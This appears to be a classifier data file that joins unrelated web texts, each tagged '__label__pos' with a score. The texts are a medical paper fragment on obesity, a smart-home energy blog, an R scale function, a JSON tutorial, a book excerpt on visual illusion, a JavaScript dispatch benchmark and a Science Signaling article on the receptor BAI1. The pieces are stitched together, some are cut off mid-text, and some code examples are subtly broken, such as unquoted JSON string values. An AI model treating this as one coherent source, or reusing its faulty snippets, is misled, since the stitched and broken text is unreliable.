growth in childhood increased the risk of obesity in adulthood, especially in males with low birth weight Among boys who grew rapidly, the risk of obesity in adulthood was similar for both lower and higher birth weights Footnotes • Funding These analyses were funded by the Department of Health. The views expressed in this publication are those of the authors and not necessarily those of the sponsors. • Competing interests None declared. • Accepted 29 June 2001 View Full Text
__label__pos
0.684757
Forest Mist Advertisement Welcome to the world of smart homes, where energy efficiency isn’t just a dream—it’s reality! Imagine your house knowing exactly when to turn off the lights, adjust the thermostat, or even power down unused appliances. This isn’t magic; it’s the power of smart technology at work. Smart homes are changing the game by using less energy, saving money, and making our lives easier. They learn from our habits and adjust to them, ensuring we’re only using energy when we really need it. How Are Smart Homes Revolutionising Energy Efficiency? Table of Content The Rise of Smart Homes: A New Era in Energy Management Smart Thermostats: The Heartbeat of Energy Savings Intelligent Lighting Solutions: Shining a Light on Efficiency Energy Monitoring Systems: Gaining Insights into Your Consumption Smart Appliances: Revolutionising Home Efficiency Renewable Energy Integration: The Future of Smart Homes The Impact of Smart Homes on the Environment and Economy FAQs Smart Homes The Rise of Smart Homes: A New Era in Energy Management Imagine your house taking care of itself and even saving you money. That’s exactly what smart homes do. With home automation, things like lights, heating, and even appliances are connected and can talk to each other. This isn’t just cool; it’s super practical. Smart homes are all about energy efficiency. For example, your heating system can learn when you’re usually home and adjust the temperature just in time for your arrival, avoiding waste when you’re not there. Lights can turn off automatically when no one’s in the room. This means you use less energy, which is great for your wallet and the planet. Energy management gets a major upgrade in smart homes. You can see exactly how much energy you’re using (and saving) in real-time, often through an app. This insight allows you to make changes that can lead to even more savings. It’s like having a personal energy coach right at your fingertips. The shift to smart homes is significant because it changes how we interact with our living spaces. Instead of manually controlling each aspect of our home, we can automate processes, making life easier and more efficient. This isn’t just about convenience; it’s a smarter way to use resources, reducing our environmental footprint without sacrificing comfort. In essence, smart homes represent a blend of innovation, convenience, and sustainability. They’re a peek into the future of living, where technology helps us manage our homes and energy use more effectively, making our lives better in the process. Smart Thermostats: The Heartbeat of Energy Savings Smart thermostats are a game-changer when it comes to managing your home’s heating and cooling. They’re not just cool gadgets; they’re powerful tools for slashing energy consumption. By learning your schedule and preferences, smart thermostats adjust your home’s temperature to just right, when you need it. This means no wasted energy on an empty house or overheating your bedroom while you’re snuggled under the covers. Think about it: heating and cooling can gobble up a huge chunk of your energy bill. It’s like a hungry monster that’s always looking for more. But smart thermostats are like the monster tamers. They keep everything in check, making sure you’re comfortable without overdoing it. This balance is the secret sauce to energy savings. With a smart thermostat, you’re not just controlling temperature; you’re controlling costs. The magic of smart thermostats doesn’t stop with automatic adjustments. They give you the power to monitor and manage your energy consumption from anywhere. Got a smartphone? Then you’ve got the power. It’s like having a remote control for your home’s energy use. Did you forget to adjust the thermostat before leaving for vacation? No problem. A few taps on your phone, and you’re saving energy while soaking up the sun on a beach. And here’s the best part: all this convenience and control adds up to significant energy savings. Over time, smart thermostats can pay for themselves through lower energy bills. You get a comfy home and a happier planet, thanks to reduced energy consumption. In short, smart thermostats are not just smart; they’re wise investments for both your wallet and the world. They tackle the challenge of heating and cooling with ease, making energy savings a breeze. So, if you’re looking to cut down on energy consumption, consider a smart thermostat your new best friend. Intelligent Lighting Solutions: Shining a Light on Efficiency Smart lighting systems are changing the game in making our homes and offices more energy efficient. Imagine walking into a room and the lights just magically turn on. That’s not magic, though; it’s intelligent lighting at work. These systems are designed to be super smart, using LED lights, motion sensors, and other tech to use less energy while still keeping things bright and cosy. First off, LED lights are heroes in the world of energy efficiency. They use a fraction of the energy compared to traditional bulbs and last way longer. So, when you pair LED lights with a smart lighting system, you’re already on your way to cutting down your electricity bill and doing the planet a favour. But here’s where it gets even cooler: motion sensors. These nifty gadgets can detect when someone is in the room and turn the lights on or off accordingly. No more shouting at someone for leaving the lights on! If a room is empty, the lights go off automatically. This means you’re only using energy when you really need it. It’s like your lights have their own brain, always thinking about how to save energy. Smart lighting systems don’t just stop there. They can be programmed to adjust the brightness based on the time of day or even controlled remotely from your smartphone. Imagine dimming the lights without having to get up from your cosy spot on the couch. That’s not just convenient; it’s smart energy use. Intelligent lighting systems with LED lights and motion sensors are revolutionising how we use light. They’re all about providing the right amount of light, exactly when and where you need it, without wasting energy. This is a big win for our wallets and an even bigger win for the planet. Energy Monitoring Systems: Gaining Insights into Your Consumption Energy monitoring systems are like having a super smart friend who keeps an eye on how much electricity you’re using every single moment. That’s pretty much what an energy monitoring system does. It’s like having a personal assistant for your home’s energy use, watching over how much power you’re consuming in real time. Here’s the deal: these systems give you a crystal-clear picture of your power consumption. It’s like having x-ray vision for your home’s energy habits! By tracking every watt in real-time, you get to see exactly where your energy is going. Whether it’s that old fridge in the kitchen or the air conditioner you forgot to turn off, you’ll know what’s using up your power. Now, why is this awesome? Because it hands you the power to make smarter choices. With these consumption insights, you can pinpoint the energy hogs in your house and decide how to cut down on waste. Maybe it’s time to finally replace that fridge, or maybe you’ll become more mindful about turning off lights when you leave a room. Moreover, this isn’t just about saving money on your electricity bill (which is a pretty great perk, by the way). It’s also about being kind to our planet. By reducing our power consumption, we’re taking steps to lessen our environmental footprint. Every little bit helps! In essence, energy monitoring systems are your allies in navigating the world of electricity use. They offer a clear, detailed look into your consumption habits, providing valuable insights that can lead to significant savings and a lighter environmental impact. So, by embracing real-time tracking, you’re not just watching your energy use; you’re actively managing it for a better tomorrow. How empowering is that? Smart Appliances: Revolutionising Home Efficiency Smart appliances are making our homes more energy-efficient and our lives a bit easier. These gadgets, like smart refrigerators, washers, and ovens, are not just cool to have; they’re smart in saving energy too. First off, smart appliances come with something super handy called energy-saving modes. What this means is that they can adjust how they operate to use less energy. For example, a smart refrigerator can figure out when it’s full and needs to work harder to keep everything cool, or when it’s not so packed and can take it easy, saving energy. Then there’s the magic of remote control. Imagine controlling your oven while sitting on the couch or checking if you’ve left the washer on from your phone. This isn’t just convenient; it helps save energy too. You can turn them off or adjust settings without having to be right there, making sure they’re only on when needed. Smart appliances also learn from how we use them. They get to know our routines and can suggest the best times to run at lower energy rates or avoid peak hours, boosting home efficiency. And this smart scheduling helps in cutting down energy use without us having to do much. In essence, smart appliances are like the thoughtful members of the family, always looking out for ways to help us save energy. They blend in, making our homes smarter and our planet a little greener. By automating savings and giving us control from afar, they’re key players in the push for more energy-efficient homes. Renewable Energy Integration: The Future of Smart Homes Integrating renewable energy sources, like solar panels and wind turbines, with smart home systems is like giving your house a brain upgrade. It’s all about making your home more sustainable, smarter, and kinder to our planet. Let’s dive into how this smart blend works and why it’s so cool. Imagine your home, not just as a place to live, but as a smart buddy that helps you save energy and the environment. Solar panels on your roof capture sunlight and turn it into electricity. Wind turbines can do something similar, but they use wind instead. This isn’t just good for the planet; it’s great for your wallet too! Now, mix in smart home systems. These systems are like the brains of the operation. They can decide when to use the energy from your solar panels or wind turbines, store it, or even sell it back to the grid. Imagine your home automatically choosing the greenest and cheapest energy source at any time of the day. Cool, right? This setup isn’t just about using renewable energy; it’s about using it smartly. Your smart home can learn your habits, like when you’re usually out, turn off unnecessary lights, adjust the thermostat, or charge your electric car when energy is cheapest and greenest. In short, combining renewable energy sources with smart home systems is a win-win. It’s all about sustainability, saving money, and living in a way that’s better for the Earth. With solar panels and wind turbines, your home doesn’t just take from the planet; it gives back, making a brighter future for all of us. The Impact of Smart Homes on the Environment and Economy Smart homes are like your regular homes but with a brainy twist. They’re equipped with gadgets that can think and make decisions to make our lives easier. But it’s not just about convenience; smart homes have a big role in painting a greener, more sustainable future. First off, smart homes are great news for the environment. They’re all about using energy more wisely. Imagine your home knows when to turn off the lights, lower the heat, or even start your washing machine at the most energy-efficient time. This doesn’t just save energy; it cuts down on your home’s carbon footprint. That’s a big step towards reducing the overall environmental impact of our daily lives. Now, let’s talk dollars and sense. Smart homes come with economic benefits that are hard to ignore. By being energy-efficient, they can significantly lower your monthly bills. You save money, and the planet saves a bit of its precious resources. Plus, as more homes become smart, there’s a growing demand for tech-savvy professionals to design, install, and maintain these systems. This means more jobs and a boost to the economy. But there’s more. Smart homes are paving the way for a more sustainable future. They’re part of a bigger picture where technology and eco-friendliness go hand in hand. By embracing smart homes, we’re not just making our lives easier; we’re taking a step towards a future where our planet’s health is a priority. Smart homes are more than just a cool gadget fest. They’re a key player in the quest for a more sustainable and economically vibrant world. By reducing our environmental impact and offering economic benefits, smart homes are helping us walk towards a future where both the planet and our wallets are a bit healthier. Conclusion Smart homes are truly changing the game when it comes to saving energy. Imagine your house knowing exactly when to turn off lights, adjust the thermostat, or even manage your appliances to ensure you’re using energy only when needed. This isn’t just convenient; it’s a game-changer for reducing our carbon footprint and slashing those pesky energy bills. By embracing smart technology, we’re not just making our lives easier; we’re stepping into a future where our homes work smarter, not harder, to create a greener, more sustainable world. It’s an exciting time to be part of this revolution! FAQs What are smart homes? Smart homes use technology to control appliances, lighting, and heating remotely or through automation, making life easier and saving energy. How do smart thermostats save energy? Smart thermostats learn your schedule and preferences, adjusting your home’s temperature automatically to save energy when you’re away or asleep. Can smart lights really lower my energy bill? Yes! Smart lights can be programmed to turn off when you leave a room or adjust based on natural light, reducing unnecessary electricity use. What role do smart appliances play in energy efficiency? Smart appliances can run during off-peak energy hours to save costs, and they’re often more efficient than traditional models, using less power for the same tasks. How do smart homes monitor energy usage? Many smart homes have energy monitoring systems that track how much electricity you’re using and identify areas where you can cut back to save energy. Is it worth upgrading to a smart home for energy savings? Definitely. While there’s an upfront cost, the long-term savings on your energy bills and the convenience they offer can make smart homes a worthwhile investment. Also for you... error: Content is protected !!
__label__pos
0.692932
# We wrap the calculation into a function myMisconception, which takes 3 parameter # programming by Li Fumin, based on the conversion written by James Abbott # the index from 0 to 101 (since we'll need to do 101-100) myMisperception <- function(X = 0.1, Y = 0.01, viewer = 10) { i <- 0:101 n_i <- 1/(abs(i-viewer) ^ X) below_viewer <- n_i[2:viewer] - n_i[1:(viewer-1)] above_viewer <- abs(n_i[(viewer+3):102] - n_i[(viewer+2):101]) dis_i <- c(below_viewer, 0, above_viewer) cum_i <- cumsum(dis_i + Y) # the value for rescaling will be the maximum cumulative sum observed: cum_i <- (100/ cum_i[100])*cum_i return(cum_i) } # to view each individual scale in A6.2, just type: myMisperception(X = 0.1, Y = 0.01, viewer = 10) # To calculate correlation between any of 2 scales in A6.3: library("Hmisc") m <- data.frame( Viewer_10=myMisperception(X = 0.1, Y = 0.01, viewer = 10), Viewer_20=myMisperception(X = 0.1, Y = 0.01, viewer = 20), Viewer_30=myMisperception(X = 0.1, Y = 0.01, viewer = 30), Viewer_40=myMisperception(X = 0.1, Y = 0.01, viewer = 40) ) m2 <- data.frame( Viewer_10=myMisperception(X = 0.1, Y = 0.01, viewer = 10), Viewer_90=myMisperception(X = 0.1, Y = 0.01, viewer = 90) ) res <- rcorr(as.matrix(m2)) res
__label__pos
0.997653
Introduction to JSON, JSON Examples and How JSON differs from XML What is JSON? JSON (JavaScript Object Notation) is a lightweight data-interchange format. It is easy for humans to read and write. It is easy for machines to parse and generate.  JSON is a text format that is completely language independent.  It originates from the JavaScript language, Standard ECMA-262 3rd Edition – December 1999 and is represented with two primary data structures: ordered lists (recognized as ‘arrays’) and name/value pairs (recognized as ‘objects’). Why You will use JSON? The JSON standard is language-independent and its data structures, arrays and objects, are universally recognized. These structures are supported in some way by nearly all modern programming languages and are familiar to nearly all programmers. These qualities make it an ideal format for data interchange on the web. How JSON differs from XML? The XML specification does not match the data model for most programming languages which makes it slow and tedious for programmers to parse. Compared to JSON, XML has a low data-to-markup ratio which results in it being more difficult for humans to read and write. JSON Examples: Array – myArray = [ “John Doe”, 30, false, null ] You can assign value of an array element like below in javascript – myArray[1] = 50 Object – myObject = { “first”: “John”, “last”: “Doe”, “age”: 30, “sex”: “M”, “salary”: 50000, “subcription”: false } You can assign value of an object property like below in javascript – myObject.salary = 50000 myObject[“salary”] = 50000 Array with objects – myArray = [ { “name”: “John Doe”, “age”: 30 }, { “name”: “Michel Smith”, “age”: 34 }, { “name”: “Jonas Scott”, “age”: 49 } ] You can assign value of an object property like below in javascript – myArray[0].name = John Doe Object with nested arrays and objects – myObject = { “first”: “John”, “last”: “Doe”, “age”: 35, “sex”: “M”, “salary”: 50000, “registered”: true, “interests”: [ “Reading”, “Blogging”, “Hacking” ], “favorites”: { “color”: “Green”, “sport”: “Cricket”, “food”: “Fish Fry” }, “skills”: [ { “category”: “JavaScript”, “tests”: [ { “name”: “One”, “score”: 60 }, { “name”: “Two”, “score”: 76 } ] }, { “category”: “Spring”, “tests”: [ { “name”: “One”, “score”: 59 }, { “name”: “Two”, “score”: 74 } ] } ] } You can assign value of a property like below in javascript – myObject.skills[0].category = Java myObject[“skills”][0][“category”] = Java myObject.skills[1].tests[0].score = 80 myObject[“skills”][1][“tests”][0][“score”] = 80 Gopal Das Follow me Gopal Das Founder at GopalDas.Org He is a technology evangelist, Salesforce trainer, blogger, and working as a Salesforce Technical Lead. After working in Java based project implementation, he jumped to the Salesforce system on a whim and never looked back. He fell in love with Salesforce’s flexibility, scalability, and power. He expanded his knowledge of the platform and became a Certified App Builder, Administrator, Platform Developer I, SalesCloud Consultant while leading the Salesforce implementation and technology needs. He has worked in a wide variety of applications/services like desktop, web and mobile applications. Gopal Das Follow me Leave a Reply Your email address will not be published. Required fields are marked *
__label__pos
0.999336
× Uh-oh, it looks like your Internet Explorer is out of date. For a better shopping experience, please upgrade now. The Nature of Visual Illusion       The Nature of Visual Illusion 3.0 1 by Mark Fineman   See All Formats & Editions It is estimated that the human eye can discriminate among 7.5 million colors — an extraordinary number that gives a clue to the complexity and capabilities of the human visual perception system. In this fascinating, profusely illustrated study, Professor Mark Fineman explores the psychology and physiology of vision, including such topics as light and color, Overview It is estimated that the human eye can discriminate among 7.5 million colors — an extraordinary number that gives a clue to the complexity and capabilities of the human visual perception system. In this fascinating, profusely illustrated study, Professor Mark Fineman explores the psychology and physiology of vision, including such topics as light and color, motion receptors, the illusion of movement, kinetic art, how we perceive size, how our eyes move, phantoms of the visual system and many other subjects. Take, for example, the simple question, "Why does the world look the way it does?" Although seemingly simple on the surface, the question is maddeningly complex on closer inspection. Why, for instance, does one object appear circular, another square, and so forth? Moreover, if we view an object on a slant, its image on the retina changes, yet the mind remains aware of the true shape of the object. Scientists are still puzzling over exactly how the eyes and the brain work together to perceive even the simplest shapes. You'll also find illuminating discussions of such phenomena as the "wagon wheel effect," i.e., the illusion that the wheels of a stagecoach, seen on film, appear to be turning in the reverse direction; or why human beings possess superb depth perception, although there is little about the structure of the eye that accounts for it. Especially interesting is the author's treatment of the processes involved in our perception of such visual illusions as the Necker cube, the Hermann grid, Poggendorff's illusion, and many more. Readers will also welcome the wealth of demonstrations included, which students can perform themselves to learn firsthand the principles involved. Arranged in nineteen concise chapters — each explaining a different visual phenomenon — this richly illustrated text offers a wonderful introduction to the field of visual perception. It will appeal to students of psychology as well as to those in such fields as art, design, and photography. Preface. Annotated Bibliography. Index. Over 100 illustrations, including 5 in full color. Product Details ISBN-13: 9780486291055 Publisher: Dover Publications Publication date: 07/09/1996 Pages: 240 Product dimensions: 6.55(w) x 9.27(h) x 0.59(d) Read an Excerpt The Nature of Visual Illusion By Mark Fineman Dover Publications, Inc. Copyright © 1981 Oxford University Press, Inc. All rights reserved. ISBN: 978-0-486-15009-3 CHAPTER 1 A Light and Color Primer Almost everyone has seen color samples in a paint store, those small squares of color arranged in neat progessions on cards. A paint manufacturer provides his customers with several hundred samples at most, but imagine for a moment that someone set out to create every possible color that the human eye could distinguish. How many colors would there be? Thousands? Tens of thousands? Actually, the number of discriminably different colors has been estimated to be about 7.5 million! How is that possible? Are there over seven million different kinds of receptors in the eye? Is light itself made up of millions of colors? Color vision is a good topic with which to start an examination of visual perception because it illustrates many of the complexities peculiar to the larger subject of vision. Before we try to understand the workings of color vision, however, it would be a good idea to consider a few fundamentals of vision. VISUAL PERCEPTION In the simplest of definitions, visual perception can be reduced to three events: 1. the presence of light, 2. an image being formed on the retina, and 3. an impulse transmitted to the brain. 1. Vision requires a stimulus. This stimulus is normally in a form of energy called light. Although sometimes a person claims to see in the absence of light, as in a dream or hallucination, these are special instances that do not pertain to the immediate discussion. 2. The light stimulus enters the eye, where it is refracted (bent) in such a way that an image is formed on the interior of the eye, a light sensitive surface known as the retina. The image-forming parts of the eye are the cornea, a clear bulge at the front of the eye, and the lens, located within the eye a short distance behind the cornea. You can see someone else's cornea by asking that person to stare straight ahead while you observe his eye from the side. The iris and pupil mechanism, interposed between cornea and lens, regulates the overall level of light that enters the eye. In bright light the pupil constricts, and in dim light it dilates. The pupil itself is an aperture whose diameter is controlled by the surrounding colored iris. The lens and the retina are on the interior of the eye and cannot be seen just by looking at the exterior of another person's eye. The retina is composed of millions of specialized receptor cells, as well as other types of cells that support the transmission from the retina to the brain. The receptors respond to the light striking them (the image) by triggering a chain of chemical reactions. It is this series of chemical changes that is transmitted from cell to cell, from retina to brain. 3. Thus the third event is the transmission of this chemical impulse to the brain, causing further chemical changes in the billions of cells that constitute the brain. These alterations in brain activity are unquestionably at the core of our responses to light, responses that can be conveniently categorized as "seeing." To summarize then, any time we talk about visual perception, three events must occur: a stimulus, an image, and the transmission of the impulse to the brain. Because of this, an analysis of any visual phenomenon—including color vision—can be made at one or more of these levels. In this chapter I would like to pay particular attention to some basic features of color vision, while at the same time noting some general features of visual perception. LIGHT AND COLOR The visual stimulus, light, is one manifestation of electromagnetic energy, which also encompasses such familiar phenomena as X rays, and radio and television transmissions. Electromagnetic energy can be pictured as having the regular undulations of a wave, one whose distance from peak to peak may vary. For this reason it is common practice to describe an electromagnetic phenomenon in terms of its wavelength. If electromagnetic energy were arrayed according to wavelength, from shortest to longest, so as to form a spectrum, X rays would occur at the short end, broadcast bands would be at the long end, and the waves to which vision responds (visible light) would occupy an intermediate position. In fact, the wavelengths of visible light vary from about 300 to 700 nanometers. Since a single nanometer is a mere billionth of a meter long, it can be quickly appreciated that waves of visible light are still quite short. In addition, electromagnetic energy (including visible light) has particle properties. When applied to light, a particle or quantum of energy is called a photon. This photon is often conjectured to be like a tiny packet of energy, one that oscillates in waveform as it travels. No one is entirely certain why it is that we respond exclusively to the relatively tiny portion of the electromagnetic spectrum occupied by visible light. Some theorists have speculated that since these wavelengths are abundant in the sun's radiations, it is reasonable to suppose that we would have evolved to be sensitive to them. It should be noted that some species of animals actually respond to slightly longer or shorter wavelengths than those of visible light. Light at different wavelengths within the visible part of the spectrum varies in color. Longer wavelengths look red and shorter wavelengths look blue. Surely everyone is familiar with Sir Isaac Newton's classic experiment: In an otherwise darkened room, a beam of sunlight was allowed to pass through a slit in a window-shade. The beam then passed through a glass prism and finally on to a screen. The prism had the effect of separating out the component wavelengths of the original beam of white light (light which contained all wavelengths in roughly equal proportions), creating a spectrum of visible wavelengths. Nature repeats substantially the same experiment whenever a rainbow appears. Thus we can see a basis for color vision in the stimulus itself, and one might be inclined to assume that color vision is largely a matter of detecting various wavelengths of light. Even though this hypothesis is attractive, it still cannot account for the complexity of color vision. Remember that there are only about 400 wavelengths of visible light, yet we see millions of color tints and shadings. Even if we could discriminate every wavelength of visible light, we could account for the perception of no more than a few hundred colors at best. INTENSITY AND BRIGHTNESS The intensity of light is a measure of its energy. It is calculated by multiplying the frequency of light by a constant, named for the eminent German physicist Max Planck who discovered it, and which is therefore called Planck's constant. Now you might suppose that if the energy of light were increased, we would always report that the light appeared brighter. In fact, however, the brightness of an object is only partially related to the energy of the light given off by that object. The intricacy of the intensity-brightness relationship is implicit in the word brightness itself, since brightness refers to how people see or respond to the energy dimension rather than to the energy itself. You may find it convenient to think of brightness as a measure of perceived intensity. Many researchers consider brightness perception to be an integral part of color vision. Why has it been necessary to construct this confusing concept of brightness? Why not stick with a straightforward measure of light energy? One reason is shown in the accompanying illustration, in which several gray squares are enclosed by larger squares. In every case the interior squares reflect equal levels of light to the viewer's eyes, a fact that could be easily verified by measuring them with a light meter, or by inspecting the interior squares without the surrounding squares. For example, cut out the white mask and place it over the illustration so that only the inner squares can be seen. When viewed against the uniform white background, the interior squares should appear equally bright. Even though the inner squares are of equal intensity, they nonetheless appear to be of unequal brightness values when the surrounding squares are in view. This contrast effect is attributable to the viewer's own visual system and will be discussed again in later chapters. One of the reasons that color vision is so difficult to fathom is that both the nature of light and the nature of the observer's visual system must be considered, as these illustrations may have already suggested. Therefore, let's turn to some of the complications created by the interaction of stimulus and observer. COLOR MIXING AND COLOR VISION More than a century ago, Thomas Young, the English physicist and physician, suggested that lights of any three different colors may be combined to create all of the remaining colors of the visible spectrum. For example, if a beam of green light is projected on to a white screen, and a beam of red light is made to overlap the first beam on the screen, the overlapped region will appear yellowish. Thus three lights and their combinations are all that would be needed to create all of the colors of the visible spectrum. In the red and green example, the receptors of the retina are stimulated by wavelengths at two locations on the spectrum, and so this is an example of an additive color mixture. (Additive mixtures are typical of the human eye.) Most people, however, are more familiar with a subtractive color mixture such as the type that occurs when paints or pigments are combined. Mixing blue paint with yellow paint yields green. It is called a subtractive mixture because the combination of paints acts to absorb light in certain portions of the spectrum while allowing light at the remaining wavelengths to be reflected to the eye. The important consideration is that only three colors and their combinations are needed to create all of the spectral colors. Young further theorized that there need be only three types of color receptors in the eye, each responsive to a different portion of the spectrum. Their combined activity could then account for the remaining colors. This trichromatic theory of color reception has now been amply supported by the evidence of many laboratory studies, and there is no need to postulate the existence of scores of different cell types in the retina—let alone millions—in order to account for color vision at the level of the eye. On a more practical level, our knowledge of color mixture and color vision has made color photography possible, as well as color television and color printing. Color film, for example, is a sandwich of three photosensitive layers, each of which reacts chemically to a different portion of the spectrum. The mechanism by which color film operates is therefore analogous to that of the color receptors in our eyes. COLOR INTERACTIONS Although the trichromatic theory helped to simplify our understanding of color receptors, it didn't answer all the questions. There are some colors that do not appear in the spectrum arrayed by Newton's prism. Where do colors like pink and brown fit in? Metallic colors (such as silver and bronze) and shades of gray also bear no obvious relationship to the spectrum. Part of the answer lies in the fact that colored light may be combined with white light to varying degrees. Red light combined with white light will appear lighter, more "pinkish." The grays are a function of intensity of white light and can only be seen as surfaces, not in lights. Colors can also interact in many ways. One way to see a color interaction is to repeat the earlier contrast demonstration substituting colored paper squares for the gray patches. Any kind of uniformly colored paper will do. Cut out several squares of the same color (a pale green works well) and see how the squares compare when placed against patches of other colors. You should be able to detect subtle differences in brightness, as before, but also slight differences in tint as well. COLOR CONSTANCY Understanding color vision is also complicated by a characteristic of observers called hue constancy or color constancy. So far we have assumed that the light ordinarily illuminating our environment is white light, containing roughly equal proportions of light from all of the visible wavelengths. In actuality white light is the exception rather than the rule. Sunlight only approaches the white standard around noontime. At other times of the day its spectral composition is more varied due to the filtering properties of the atmosphere; sunlight passes through varying thicknesses of atmosphere at different times of the day, and the color of sunlight may be affected by dust particles and pollutants suspended in the air. Toward sunrise and sunset light has relatively more energy at the red end of the spectrum and somewhat less at shorter wavelengths than is typical at high noon. Most lightbulbs also emit a spectrum that is biased from true white light. Incandescent bulbs are reddish, while fluorescent tubes are deficient in long wavelengths and therefore emit a spectrum that is bluish when compared with white light. We are not normally aware of these discrepancies from white light. Even though objects reflect varying percentages of the visible wavelengths under different conditions of illumination, color perception remains constant. Common objects look much the same whether seen by sunlight, lightbulb, or fluorescent tube. The visual system seems to disregard minor discrepancies in spectral composition so that colors appear much as they would under white light illumination. In this way we are able to maintain a stable world of color under changing conditions of illumination. One way to demonstrate the constancy of color vision is to take color photographs of the same scene under different conditions of illumination. The best film to use is color slide film, such as Kodak's Kodachrome or Ektachrome, both of which are said to be "balanced" for sunlight at noon. Unlike the visual system of humans, color film cannot adapt to shifts in the coloration of the illuminating light, and its appearance will change as the color quality of the light changes. Try making the following comparison: Take a series of pictures of the same subject at regular intervals throughout the day. You will find that the presence of a few normally white objects in the scene will help to evaluate the results. You may be surprised to see dramatic color changes from picture to picture, changes you had not even been aware of while taking the pictures. Next, take some pictures indoors with the same film, using the light of electric fixtures as the sole illuminant. What would you predict about the appearance of color in pictures that had been illuminated by lightbulbs, as compared with fluorescent illumination? The adaptability of color vision has its limits. While wide fluctuations in color quality are tolerated in vision, too narrow a band of wavelengths is unacceptable for normal perception of color. To prove this point, obtain a good quality red or green lightbulb and try to identify the colors in magazine illustrations using the bulb as the sole source of illumination. This is a little tricky since you will have had some acquaintance with the colors of many of the objects depicted in the magazine. If you remain perfectly objective, however, you will see that the magazine looks dramatically different under the uniform illumination. If you use a red bulb, the blue printed areas of the page will appear dark. Because much of the light emitted by the bulb is in the long end of the visible spectrum, the red dyes on the printed page will continue to reflect light to the eye, but the bulb emits few wavelengths at the blue end of the spectrum and so there is nothing for the blue dyes to reflect. Therefore areas that looked blue under normal illumination now appear almost black under red light illumination. The peculiar appearance of colors under homogeneous color illumination is much the same as happens with certain kinds of street lighting, such as the newer sodium or mercury vapor lamps, which emit light only wtihin a narrow band of wavelengths. (Continues...) Excerpted from The Nature of Visual Illusion by Mark Fineman. Copyright © 1981 Oxford University Press, Inc.. Excerpted by permission of Dover Publications, Inc.. All rights reserved. No part of this excerpt may be reproduced or reprinted without permission in writing from the publisher. Excerpts are provided by Dial-A-Book Inc. solely for the personal use of visitors to this web site. Customer Reviews Average Review: Post to your social network       Most Helpful Customer Reviews See all customer reviews The Nature of Visual Illusion 3 out of 5 based on 0 ratings. 1 reviews. Anonymous More than 1 year ago It is NOT an illusion book. It just tells how illusions r made an how the eye sees them and all that crap. But may be interesting to some peeps!
__label__pos
0.880571
Singledispatch Benchmark created on Setup // Create a generic function that dispatches on the first argument. // Returns a wrapped function that calls `defun`. // // Custom implementations for specific types can be registered through calling // `.register(constructor, fun)` on the returned function. // // The default implementation is also exposed at `.default`. const dispatching = defun => { let key = Symbol(`singledispatch`) const singledispatch = (subject, ...rest) => { let fun = subject[key] if (fun) { return fun(subject, ...rest) } return defun(subject, ...rest) } const register = (constructor, fun) => { constructor.prototype[key] = fun } singledispatch.register = register singledispatch.default = defun return singledispatch } class Test { x = 10 log() { return this.x * this.x } } let log = dispatching(thing => console.log(thing)) log.register(Test, test => test.x * test.x) let test = new Test() Test runner Ready to run. Testing in TestOps/sec Method dispatch test.log() ready Single dispatch log(test) ready Revisions You can edit these tests or add more tests to this page by appending /edit to the URL.
__label__pos
0.988018
Research ArticleHost-Pathogen Interactions The adhesion GPCR BAI1 mediates macrophage ROS production and microbicidal activity against Gram-negative bacteria See allHide authors and affiliations Sci. Signal.  02 Feb 2016: Vol. 9, Issue 413, pp. ra14 DOI: 10.1126/scisignal.aac6250 Bacteria come to a sticky end Pattern recognition receptors (PRRs) detect microbial products and stimulate the innate immune response to infections. BAI1 is a G protein–coupled receptor of the adhesion GPCR family and is also a PRR that binds to lipopolysaccharide on the surface of Gram-negative bacteria to facilitate their internalization by macrophages. Billings et al. found that BAI1 triggered the killing of the internalized bacteria by stimulating the production of reactive oxygen species. When engaged by bacteria, BAI1 activated Rac1 to stimulate the activity of the NADPH oxidase complex Nox2 in macrophages. Mice deficient in BAI1 were inefficient at clearing Gram-negative bacteria and were likely to die from the infection. Together, these data suggest that BAI1 connects bacterial internalization with their killing. Abstract The detection of microbes and initiation of an innate immune response occur through pattern recognition receptors (PRRs), which are critical for the production of inflammatory cytokines and activation of the cellular microbicidal machinery. In particular, the production of reactive oxygen species (ROS) by the NADPH oxidase complex is a critical component of the macrophage bactericidal machinery. We previously characterized brain-specific angiogenesis inhibitor 1 (BAI1), a member of the adhesion family of G protein (heterotrimeric guanine nucleotide–binding protein)–coupled receptors (GPCRs), as a PRR that mediates the selective phagocytic uptake of Gram-negative bacteria by macrophages. We showed that BAI1 promoted phagosomal ROS production through activation of the Rho family guanosine triphosphatase (GTPase) Rac1, thereby stimulating NADPH oxidase activity. Primary BAI1-deficient macrophages exhibited attenuated Rac GTPase activity and reduced ROS production in response to several Gram-negative bacteria, resulting in impaired microbicidal activity. Furthermore, in a peritoneal infection model, BAI1-deficient mice exhibited increased susceptibility to death by bacterial challenge because of impaired bacterial clearance. Together, these findings suggest that BAI1 mediates the clearance of Gram-negative bacteria by stimulating both phagocytosis and NADPH oxidase activation, thereby coupling bacterial detection to the cellular microbicidal machinery. INTRODUCTION The innate immune system relies upon the ability of the host to detect and respond to both pathogenic and nonpathogenic microbes. Detection occurs through a limited set of germ line–encoded receptors called pattern recognition receptors (PRRs) (1, 2). The coordinated actions of these innate receptors drive the activity and specificity of the host response, and loss of individual receptors can have devastating consequences on innate immunity (35). Macrophages and monocytes interpret the signals from PRRs to couple microbial detection to phagocytic, microbicidal, and cell signaling machinery, which results in local inflammatory responses and bacterial clearance (6, 7). Phagocytic receptors, such as the C-type lectin receptors (8) mannose receptor (9) and Dectin-1 (10) and the scavenger receptors (11) CD36 (12) and MARCO (13), mediate the internalization of microbes from the extracellular space and their delivery to highly degradative compartments within the cell, resulting in bacterial killing and antigen processing for the generation of an adaptive immune response (14). These phagocytic receptors are crucial for innate bactericidal activity and for the compartmentalization and presentation of bacterial ligands to other PRRs, such as Toll-like receptors (TLRs) (1416). Brain-specific angiogenesis inhibitor 1 [BAI1; also known as adhesion G protein (heterotrimeric guanine nucleotide-binding protein)–coupled receptor B1] is a member of subgroup VII of the adhesion-type G protein–coupled receptors (GPCRs), which was originally identified for a role in inhibiting angiogenesis in brain tumor models (17). BAI1 was also recognized as a phagocytic receptor for apoptotic cells, mediating apoptotic cell clearance by several cell types, including neurons, myoblasts, epithelial cells, and myeloid lineage cells (1821). We and others reported that, in addition to recognizing apoptotic cells, BAI1 also recognizes Gram-negative bacteria (20, 22). In this context, BAI1 recognizes the core oligosaccharide of bacterial lipopolysaccharide (LPS) through a series of five type 1 thrombospondin repeats in the extracellular domain (22). Binding of either apoptotic cells or Gram-negative bacteria to the extracellular domain of BAI1 stimulates the rapid rearrangement of the actin cytoskeleton, which culminates in phagocytosis of the bound particle. In this mechanism, the 